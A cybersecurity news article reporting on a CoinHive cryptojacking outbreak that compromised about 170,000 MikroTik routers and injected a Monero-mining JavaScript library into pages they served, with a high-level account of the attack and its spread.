Home > Cyber News > CoinHive Miner Virus Outbreak Has Infected 170,000 Routers
CYBER NEWS

CoinHive Miner Virus Outbreak Has Infected 170,000 Routers

The Coinhive Miner virus has infected hundreds of thousands MikroTik routers. The malware has now reportedly installed a JavaScript miner to over 170,000 devices and this recent outbreak is believed to be getting bigger and bigger.

The first hint of attacks was discovered by researcher who goes by the nickname MalwareHunterBR and who tweeted, that the miner has started to spread at an alarming rate. In addition to this, news have also broken out that the first stages of the attack compromised about 70 thousand routers alone.




What is Behind Coinhive’s Infection Success

What is believed is that the hacker may have used one of the exploits for MikroTik devices to perform a zero-day type of attack through one device and then in the device drop a copy of the Coinhive library. This library is also in all of the pages which are displayed by the router, making all of the devices connected to it vulnerable.

And furthermore, since the zero day has been exploited by using only one Coinhive key for all of the injections performed by cooinhive via the past week, it is belived that only one attacker is behind the attack.

In addition, researchers also claim that non-MikroTik users were also among the victims, because some of the Internet Service providers have used MikroTik devices via their main network and since the hacker has injected the JavaScript code, this attack has spread to all of the devices that are logically connected to the MikroTik routers that are compromised.

The injection has worked with a tremendous success because of the fact how the attack is done and the fact that the infection process has succeeded in obtaining incomingand outgoing traffic control successfully.

For more information and removal of the Coinhive miner, you should visit the related article underneath:

Related: How to Remove Coinhive Monero Miner Trojan from Your PC




The Attack Is Now Spread on A Global Scale and Will Likely Continue Increasing

Since the miner virus has been used to gain control of an insane ammount of traffic in a short timeframe, a lot of users and ISPs are likely to fight back and this is the main reason why researchers believe that the hacker behind this version of Coinhive miner knows that.

According to Trustwave researchers, ISPs and users who are currently using MikroTik routers should be on alert as the threat has now been detected on other countries as well. And with this much traffic being hijacked directly from the routers instead of end devices, it is definitely a good idea to take measures as this issue affects hundreds of users on a daily basis.

The CoinHive Miner Focused on Monero

The original Coinhive Miner malware has been initially used as a JavaScript, that is embedded in a Tojan, which used scripts to mine for the cryptocurrency Monero by overloading the system resources of the computers infected by it. It quickly grew to be one of the biggest threats out there by ensuring massive access to users who have placed in on different websites all across the world. The miner has also been detected on many famous Torrent websites, such as Kickass Torrents and The Pirate Bay. But this is not all, the Coinhive miner has also been reported to be installed by Trojans and be incorporated directly in the web browsers of victims. All of these ideas turned reality by cyber-criminals have successfully resulted in a massive rise in cryptocurrency miners with Coinhive miner being in charge among the JavaScript miner viruses.

Ventsislav Krastev

Ventsislav is a cybersecurity expert at SensorsTechForum since 2015. He has been researching, covering, helping victims with the latest malware infections plus testing and reviewing software and the newest tech developments. Having graduated Marketing as well, Ventsislav also has passion for learning new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management, Network Administration and Computer Administration of System Applications, he found his true calling within the cybersecrurity industry and is a strong believer in the education of every user towards online safety and security.

More Posts - Website

Follow Me:
Twitter

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree